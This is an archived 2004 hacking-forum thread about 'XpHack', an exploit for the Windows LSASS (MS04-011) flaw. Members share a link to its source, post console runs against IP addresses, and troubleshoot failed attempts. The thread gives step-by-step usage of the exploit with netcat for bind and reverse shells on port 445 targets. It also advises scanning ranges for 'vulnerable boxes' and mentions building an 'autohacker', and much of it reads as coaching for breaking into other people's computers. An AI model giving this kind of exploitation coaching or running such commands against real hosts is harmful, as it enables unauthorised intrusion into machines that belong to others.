hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Xphack.c
tonikgin
found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more

http://downloads.securityfocus.com/vulnera...ploits/xphack.c
LKM
I"m trying it right now, I will review that ph34r.gif

EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !

// Compiled exploit
thorel
QUOTE (LKM @ May 8 2004, 08:40 AM)
I"m trying it right now, I will review that ph34r.gif

EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !

heh, sounds nice smile.gif
mRtWiStEr
Nice Nice Love this Bug wink.gif

Thanks to Microsoft and Coders of this Nice xploit ! *g*


I gonna have fun with this...


tWiStEr
Alien
works good:
CODE

C:\WINDOWS>d:\hax\xp 10.10.10.61 333

    -----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\WINDOWS>nc 10.10.10.61 333
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
mRtWiStEr
Hi,
i used it so much...but here can you see what my result is can you help me what this means ??

CODE

C:\WINDOWS\Desktop\expl0its>xp ***.***.***.*** 555

    -----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\WINDOWS\Desktop\expl0its>nc ***.***.***.*** 555

C:\WINDOWS\Desktop\expl0its>


i got no shell he says it but netcat doesnt make it ??? do you know why?
BlaStA
I think the exploit failed and the port wasn't opened. Try nc -vv ***.***.***.*** 666. Then you get some verbose information.
mRtWiStEr
Hi thanks for you answere...


Hmm the ips i scanned had all the port open....

Are there several Ports or just this one port to xploit the machines?

agathos
well the source code looks good it isnt hard to put in a connect back wink.gif
but it uses the same vuln as the lsass exploit from me or HOD
anyway its a good exploit

greetz agathos
s3mtexx
isn't it something like this ?

first start nc -vv -L -p <PORT>
then execute xp localhost <PORT>

?
agathos
no its bindshell

you do xphack ip bindport

then

nc ip port
DaRul0r
What means that:

CODE

    -----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...
Error, cna't connect to victim machine



I get always this Message... do I somethink wrong?
el33t
the target port 445 is blocked by fw or router.
LittleHacker
Thanks Guys But It's Detected!
HotN0b0dy
so which ports can I try? 666, 555, 333? all of 'em?
Killahbee
yup search for servers that have those three ports wide open.....good luck m8!!

*oink*
mRtWiStEr
QUOTE (HotN0b0dy @ May 8 2004, 07:05 PM)
so which ports can I try? 666, 555, 333? all of 'em?

Yeah yu can use every port for bindshell....
Just the scan port is 445!

That's it!


(Sorry for my english -> I am from Germany ^^)
andream
why this exploit works 1 time on 20? is it due to the security fix?
Kynroxes
yeah dude tks for the source smile.gif
Masterace
THX a lot!This helped me to understand why sometimes it's possible to reconnect to a target and sometimes it's not.
popo0421

Good Exploit ! THX a lot!
I try to exploit xp host (unpatch) is always success.


DaClueless
I dont know about you, this code upsets me and points out why you should NEVER share any source code.

This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.

Rtyp3
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I dont know about you, this code upsets me and points out why you should NEVER share any source code.

This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.

ohmy.gif jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!
woverin
Thanks for sharing
woverin
After i got remote shell on victim machine, how do i transfer and execute via nc?
i know how to do it if both victim and me have nc but this exploit did not upload nc to the victim.
Any help would be appreciated.
DaClueless
QUOTE (Rtyp3 @ May 9 2004, 01:37 AM)
ohmy.gif jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!

I can see you have never spent hour and hours on something, that someone took and called their own.

For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code.
toska
What the hell? Is not password?!?!!? The end of the stupid fad? wink.gif
heh, nice work mate!
tonikgin
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I dont know about you, this code upsets me and points out why you should NEVER share any source code.

This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.

what about shellcode? look at how many reverse shell and shell binding code are the same. should they and the basic concept behind how they work be kept locked away for nobody to see? lets lock up the linux kernel while were at it also, too many smart people that understand code are finding weak buffers in it...

i can generally see where your coming from, but your just wrong. every exploit that come out are all based on exploting one weakness, each it's own. but for every advisory, look how many exploits are released for each. it's because code can be improvised to crack something each the way the author intends.

</rant>

but yeah, author should of at least acknowledged the other releases.
tonikgin
oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it.

people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.

it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.

and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.

</rant>

however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.
HotN0b0dy
yeah...this is nice source indeed, but i cant get any shells. are all ppl patched or am i doing something wrong?
Bartholo
Thanks for sharing!!


Very nice sploit ;-)
Anarchiste
This exploit use the same bind shellcode that the HouseOfDaBus version blink.gif ...so if you want a connect back shell use the houseofdabus version, it's the same...
HotN0b0dy
hmm..i'd really need some help here.
can anyone tell me why i cant connect to remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\FTP Files\Programje\XPhack>

did i miss anything? wrong port? wrong command?
thx
cross
QUOTE (DaClueless @ May 9 2004, 04:46 AM)
I can see you have never spent hour and hours on something, that someone took and called their own.

For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code.

If you would have read the first post on this thread, you would have seen this:

"found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more"

The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn tongue.gif
espey
Very good tool BIG ThX 4 it
toska
QUOTE (tonikgin @ May 9 2004, 11:20 AM)
oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it.

people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.

it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.

and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.

</rant>

however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.

Very well said.
bdark
QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM)
hmm..i'd really need some help here.
can anyone tell me why i cant connect to remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\FTP Files\Programje\XPhack>

did i miss anything? wrong port? wrong command?
thx

i guess not.. i've tested it like that and it worked fine...
1st command: xp 10.0.0.0 666
Connecting...Good
Getting a shell...OoOoOps shell!!
2nd command: nc 10.0.0.0 666
C:\windows\system32\

simple as that =)

try some other vulnerable boxes
DaClueless
QUOTE (cross @ May 9 2004, 04:47 PM)
The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn tongue.gif

Yes, the open source world is built on modding other people work so we can all learn from it. But it is not built on the fact people not giving any credit to the orig author. I feel it very simple to give one line, that says code base on so-and-so code. I am, also so shock how many people feel that, there nothing wrong about using someone work, without given then any credit.

GNU license agreement
/* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

http://www.gnu.org/licenses/licenses.html

prog
QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM)
hmm..i'd really need some help here.
can anyone tell me why i cant connect to remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\FTP Files\Programje\XPhack>

did i miss anything? wrong port? wrong command?
thx

take your -vv out of your nc line
nowhere
QUOTE (mRtWiStEr @ May 8 2004, 10:46 AM)
Hi,
i used it so much...but here can you see what my result is can you help me what this means ??

CODE

C:\WINDOWS\Desktop\expl0its>xp ***.***.***.*** 555

    -----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!

C:\WINDOWS\Desktop\expl0its>nc ***.***.***.*** 555

C:\WINDOWS\Desktop\expl0its>


i got no shell he says it but netcat doesnt make it ??? do you know why?

lol! i think it was better u play cards or playmobile! wink.gif sorry but those questions are stupid! sorry iam not 100 % but some questions or answer are funny!
HotN0b0dy
is it possible that my nc isnt workin? cuz i dont get any shells dry.gif
DaRul0r
I have the same Prob like HotNoob sad.gif
bdark
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
is it possible that my nc isnt workin? cuz i dont get any shells dry.gif

I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
EzMe

Very handy for making an autohacker smile.gif
HotN0b0dy
QUOTE (bdark @ May 10 2004, 05:06 PM)
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
is it possible that my nc isnt workin? cuz i dont get any shells  dry.gif

I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.

it's same if i dont type -vv. -vv just tells me where's the error, if it is. And i scanned IPs before i started exploiting 'em.
Are PCs maybe patched?
LKM
This exploit is easy to use

first cmd.exe : nc.exe -l -p 66
second cmd.exe : xp.exe 0 vic ip 66 your ip
..
..
and you'll get shell on the first cmd.exe

If it isn't working, vic is patched, filtering 445 .

Try also several time, somtimes it doesn't work, I don't know why.
LittleHacker
Please someone tell me what Bug it uses ?
tonikgin
^^^^^ ?

It's people like this that keep this board from it's true potential.

ms04011
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.